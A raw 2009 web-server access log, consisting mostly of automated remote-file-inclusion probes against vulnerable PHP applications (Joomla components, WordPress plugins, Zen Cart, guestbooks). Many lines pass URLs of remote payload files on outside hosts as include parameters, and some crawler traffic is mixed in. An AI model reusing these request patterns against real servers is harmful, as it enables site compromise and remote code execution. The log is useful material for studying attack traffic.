125.141.196.8 - - [07/Sep/2009:03:04:16 -0500] "GET //guestbook1//admin.php?include_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:03:04:16 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:14 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:14 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:24 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:25 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:37 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:38 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:43 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:06:44 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.131 - - [07/Sep/2009:03:07:47 -0500] "GET /logs/access_log.1120176000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
151.8.79.19 - - [07/Sep/2009:03:14:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
151.8.79.19 - - [07/Sep/2009:03:14:09 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
151.8.79.19 - - [07/Sep/2009:03:14:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
151.8.79.19 - - [07/Sep/2009:03:14:10 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.55.106.179 - - [07/Sep/2009:03:15:32 -0500] "GET /logs/access_log.1146528000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [07/Sep/2009:03:17:02 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:03:17:03 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:03:17:03 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:03:17:24 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:17:24 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:17:24 -0500] "GET /logs/access_log.1246924800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:17:24 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:19:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:19:46 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:19:46 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
212.41.197.1 - - [07/Sep/2009:03:19:50 -0500] "GET /logs/index.php?visualizar=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.41.197.1 - - [07/Sep/2009:03:19:51 -0500] "GET /index.php?visualizar=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
218.38.136.251 - - [07/Sep/2009:03:19:51 -0500] "GET /logs/access_log.1246147200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:20:23 -0500] "GET /logs/access_log.1246147200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
212.41.197.1 - - [07/Sep/2009:03:23:08 -0500] "GET /logs/index.php?conteudo=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.41.197.1 - - [07/Sep/2009:03:23:08 -0500] "GET /index.php?conteudo=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
58.184.252.3 - - [07/Sep/2009:03:24:16 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:03:24:19 -0500] "GET /logs/access_log.1238112000//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:03:25:21 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:03:25:21 -0500] "GET /logs/access_log.1238112000//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:03:25:21 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
65.55.106.107 - - [07/Sep/2009:03:28:03 -0500] "GET /logs/access_log.1164240000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [07/Sep/2009:03:42:46 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:42:46 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:42:46 -0500] "GET /logs/access_log.1242518400//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:45:23 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:45:23 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:45:24 -0500] "GET /logs/access_log.1242518400//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:45:25 -0500] "GET //include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:45:25 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:45:26 -0500] "GET /logs/access_log.1242518400//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.228 - - [07/Sep/2009:03:45:42 -0500] "GET /logs/access_log.1232582400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [07/Sep/2009:03:50:25 -0500] "GET /logs/access_log.1242950400//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:51:21 -0500] "GET /logs/access_log.1246492800//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:51:41 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:51:41 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:03:51:41 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:52:40 -0500] "GET /logs/access_log.1241654400//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.85.63.226 - - [07/Sep/2009:03:52:42 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
204.15.230.189 - - [07/Sep/2009:03:56:49 -0500] "GET /logs/index.php?nic=http://www.seorakhoney.com/shop/mail/readme.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
204.15.230.189 - - [07/Sep/2009:03:56:49 -0500] "GET /index.php?nic=http://www.seorakhoney.com/shop/mail/readme.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
219.85.63.226 - - [07/Sep/2009:03:58:35 -0500] "GET /logs/access_log.1246492800//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.228 - - [07/Sep/2009:03:59:22 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.228 - - [07/Sep/2009:04:00:03 -0500] "GET /logs/access_log.1225411200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.25.226 - - [07/Sep/2009:04:02:34 -0500] "GET /logs/access_log.1236038400//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:04:02:34 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:04:02:34 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.141.56.136 - - [07/Sep/2009:04:02:43 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 204070 "-""libwww-perl/5.65"
62.141.56.136 - - [07/Sep/2009:04:02:43 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
69.175.25.226 - - [07/Sep/2009:04:02:56 -0500] "GET /logs/access_log.1244764800//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:04:03:07 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:04:03:07 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:04:03:07 -0500] "GET /logs/access_log.1237075200//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:04:04:55 -0500] "GET /logs/access_log.1240617600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:04:04:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.212.175.154 - - [07/Sep/2009:04:04:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:05:27 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 359 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:04:05:28 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
69.175.25.226 - - [07/Sep/2009:04:06:43 -0500] "GET /logs/access_log.1232755200%20%20//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.207.126 - - [07/Sep/2009:04:07:02 -0500] "GET /logs/access_log.1136505600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.212.175.154 - - [07/Sep/2009:04:10:32 -0500] "GET /logs/access_log.1248134400//s_loadenv.inc.php?DOCUMENT_ROOT=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:10:55 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:10:55 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:10:55 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:11:38 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:11:39 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:11:39 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:11:39 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:11:59 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.55.165.51 - - [07/Sep/2009:04:13:49 -0500] "GET /logs/access_log.1187136000 HTTP/1.1" 200 2083 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
218.38.136.251 - - [07/Sep/2009:04:14:04 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 204070 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:04:14:05 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
69.175.25.226 - - [07/Sep/2009:04:14:45 -0500] "GET /logs/access_log.1246579200//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.207.123 - - [07/Sep/2009:04:16:03 -0500] "GET /logs/access_log.1144800000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.146.119.209 - - [07/Sep/2009:04:16:05 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:16:05 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:16:05 -0500] "GET /logs/access_log.1232755200%20%20//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:19:04 -0500] "GET /logs/access_log.1241827200//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:20:38 -0500] "GET /logs/access_log.1236038400//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:20:38 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:20:38 -0500] "GET /logs/access_log.1237075200//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:04:20:38 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:29 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:29 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:29 -0500] "GET /logs/access_log.1237852800///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:36 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:37 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:37 -0500] "GET /logs/access_log.1242086400///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:37 -0500] "GET /logs/access_log.1237852800///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:04:22:44 -0500] "GET /logs/access_log.1242086400///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.115 - - [07/Sep/2009:04:24:02 -0500] "GET /logs/access_log.1163116800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.165.12 - - [07/Sep/2009:04:24:15 -0500] "GET /logs/access_log.1241568000 HTTP/1.0" 200 725606 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
114.4.8.14 - - [07/Sep/2009:04:24:37 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:24:37 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:24:37 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:24:37 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:27:18 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:27:18 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:27:18 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.4.8.14 - - [07/Sep/2009:04:27:18 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.208.123 - - [07/Sep/2009:04:31:39 -0500] "GET /logs/access_log.1171324800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.230 - - [07/Sep/2009:04:33:03 -0500] "GET /logs/access_log.1205625600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.165.119 - - [07/Sep/2009:04:36:47 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 200 22192 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
125.141.196.8 - - [07/Sep/2009:04:38:07 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:38:07 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:38:07 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.230.165 - - [07/Sep/2009:04:40:13 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/4.0"
65.55.230.165 - - [07/Sep/2009:04:40:13 -0500] "GET /logs/access_log.1191369600 HTTP/1.1" 200 15991 "-""Mozilla/4.0"
66.246.252.166 - - [07/Sep/2009:04:41:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.246.252.166 - - [07/Sep/2009:04:41:06 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
222.236.47.23 - - [07/Sep/2009:04:41:43 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
